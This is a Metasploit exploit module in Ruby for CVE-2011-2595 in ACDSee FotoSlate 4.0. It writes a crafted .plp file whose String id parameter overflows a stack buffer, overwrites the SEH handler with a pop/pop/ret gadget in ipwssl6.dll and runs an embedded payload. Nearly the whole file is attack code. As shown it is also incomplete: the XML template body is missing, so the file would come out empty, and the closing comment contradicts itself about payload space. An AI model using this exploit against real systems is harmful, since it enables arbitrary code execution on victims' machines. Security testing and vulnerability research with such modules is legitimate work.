##
# $Id: acdsee_fotoslate_string.rb 13853 2011-10-10 16:47:33Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
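# ACDSee FotoSlate 4.0 Build 146 - PLP "String" element id parameter
# stack overflow (CVE-2011-2595), delivered as a crafted .plp file.
#
# The module writes a single file (FILEFORMAT mixin); there is no network
# side, so the payload handler is disabled by default and the victim has to
# open the file in FotoSlate. Control of execution is taken through an SEH
# overwrite (Seh mixin): the buffer overruns an exception registration
# record at a fixed offset and the handler pointer is pointed at a
# pop/pop/ret gadget in ipwssl6.dll.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ACDSee FotoSlate PLP File id Parameter Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via
        a specially crafted id parameter in a String element. When viewing a malicious
        PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a
        buffer and execute arbitrary code. This exploit has been tested on systems such as
        Windows XP SP3, Windows Vista, and Windows 7.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Parvez Anwar', # Vulnerability discovery
          'juan vazquez'  # Metasploit module
        ],
      'Version'        => '$Revision: 13853 $',
      'References'     =>
        [
          [ 'CVE', '2011-2595' ],
          [ 'OSVDB', '75425' ],
          [ 'BID', '49558' ],
        ],
      'DefaultOptions' =>
        {
          # File-format exploit: nothing listens locally unless the user
          # explicitly re-enables the handler.
          'EXITFUNC'              => 'process',
          'DisablePayloadHandler' => 'true'
        },
      'Payload'        =>
        {
          # No 'Space' cap is enforced (see the note at the end of the file);
          # an oversized payload simply makes the file longer than TotalLength.
          #'Space'    => 4000,
          # \x00 ends the string, \x22 (") would most likely close the XML
          # attribute the id parameter lives in - confirm against the template.
          'BadChars' => "\x00\x22"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'ACDSee FotoSlate 4.0 Build 146',
            {
              # Absolute address: only valid when ipwssl6.dll is loaded at the
              # base it had on the tested build.
              'Ret'         => 0x263a5b57, # pop, pop, ret from ipwssl6.dll
              'Offset'      => 1812,       # bytes before the SEH record is overwritten
              'TotalLength' => 5000        # padded size of the overflowing buffer
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Sep 12 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.plp']),
      ], self.class)
  end

  # Build the overflowing buffer and write the .plp file.
  #
  # Buffer layout, front to back:
  #   Offset bytes of random filler (bad characters excluded)
  #   SEH record from generate_seh_record, handler = target.ret
  #   encoded payload
  #   random alpha padding up to TotalLength (only if there is room left)
  def exploit
    overflow = rand_text(target['Offset'])
    overflow << generate_seh_record(target.ret)
    overflow << payload.encoded

    # Guard the padding length: a payload larger than
    # TotalLength - Offset - SEH record would make it negative.
    pad = target['TotalLength'] - overflow.length
    overflow << rand_text_alpha(pad) if pad > 0

    # NOTE(review): the PLP XML body of this heredoc was lost in this copy
    # of the module (only `plp =<` and the TEMPLATE terminator survived);
    # restore it from the upstream module before use. Per the description,
    # the buffer goes into the id attribute of a String element, interpolated
    # as #{overflow}. As written the file is created empty.
    plp = <<-TEMPLATE
    TEMPLATE

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(plp)
  end
end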
=begin
After the SEH record there are roughly 0x23C3 (9155) bytes available for the payload, but the
file is deliberately capped at TotalLength (5000) bytes: a longer buffer risks breaking the
Meterpreter payload.
=end